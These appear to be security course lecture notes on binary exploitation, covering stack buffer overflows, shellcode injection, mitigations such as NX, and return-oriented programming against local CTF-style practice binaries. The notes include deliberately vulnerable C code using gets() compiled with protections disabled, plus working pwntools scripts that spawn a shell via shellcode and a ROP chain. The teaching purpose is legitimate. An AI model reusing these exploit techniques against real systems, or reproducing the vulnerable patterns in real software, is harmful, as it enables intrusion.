Binary Exploitation: Shellcode, Mitigations, ROP

Cool Security People of the Day (CSPoD)

• Quarkslab: Known for informative blog posts.
  • Example: Mifare Classic encrypted nonce and backdoors
• Luna: Renowned security expert and CTF player, associated with pwn.cat

The BOF Strikes Back

• Previous Topic: Buffer overflow and ret2win attack.
• Challenges:
  • Buffer overflow on stack via gets.
  • Overwriting the return address of the stack frame.
• Example Code:

  #include <stdio.h>
  #include <string.h>
  #include <stdlib.h>
  
  void win() {
      printf("How did you get here? I don't know whether to hire or fire you...");
      execve("/bin/sh", 0, 0);
  }
  
  void main() {
      char buffer[32];
      setvbuf(stdout, NULL, _IONBF, 0);
      setvbuf(stderr, NULL, _IONBF, 0);
      printf("Welcome to Paperclip Mill NLC job portal. Why should we hire you? ");
      gets(buffer);
      printf("Thanks, we received your input: %s\n", buffer);
  }
  

New Challenge

• Without a win function:

  #include <stdio.h>
  #include <string.h>
  #include <stdlib.h>
  
  void stuff() {
      asm volatile ("jmp *%%rsp;" :::);
  }
  
  void main() {
      char buffer[32];
      setvbuf(stdout, NULL, _IONBF, 0);
      setvbuf(stderr, NULL, _IONBF, 0);
      printf("Welcome to Paperclip Mill NLC job portal. Why should we hire you? ");
      gets(buffer);
      printf("Thanks, we received your input: %s\n", buffer);
  }
  

• Compilation Command:

  gcc pwnme.c -o pwnme -zexecstack -fno-stack-protector -no-pie
  

Shellcode

• Goal: Inject assembly into the program for shell execution.
• Gadgets:
  • Snippets of code utilized post-buffer overflow exploitation.
  • Use ropper to find gadgets.
  • Importance of finding writable and executable memory locations.
  • Jumping to stack with jmp rsp.

Shellcode Implementation

• Tools: pwntools, shellstorm, and other one-off tools.
• Example Solve Script:

  from pwn import *
  context.arch = "amd64"
  p = process("./pwnme")
  gdb.attach(p)
  payload = b"Z" * 40 + p64(0x40117e) + asm(shellcraft.sh())
  p.sendline(payload)
  p.interactive()
  

Mitigations

• Challenges with gets: No proper use case, rampant in C programs.
• Compiler Warnings and Mitigations:
  • Use of flags like zexecstack, fno-stack-protector, no-pie.
  • NX bits/W^X: Enforces write OR execute permissions.
• Real World Examples: Sudo utility vulnerabilities, D-Link router issues.

ROP (Return Oriented Programming)

• Concept:
  • Utilize a sequence of gadgets.
  • Programmatically align gadgets using returns or jumps.
• Calling Conventions: Registers used for function arguments.
• GOT (Global Offset Table) and PLT (Procedure Linkage Table): Facilitate external library function calls.
• Example ROP Solve Script:

  from pwn import *
  context.arch = "amd64"
  p = process("./pwnme2")
  pop_rdi = 0x401293
  binsh = 0x404060
  system_plt = 0x000000401070
  alignment_ret = 0x000000000040122d
  payload = b"F" * 40 + p64(alignment_ret) + p64(pop_rdi) + p64(binsh) + p64(system_plt)
  p.sendline(payload)
  p.interactive()
  

Summary

• Topics Covered: Shellcode injection, ROP techniques, exploitation mitigations.
• Next Topics: Leaks, ASLR, and more binary exploitation techniques.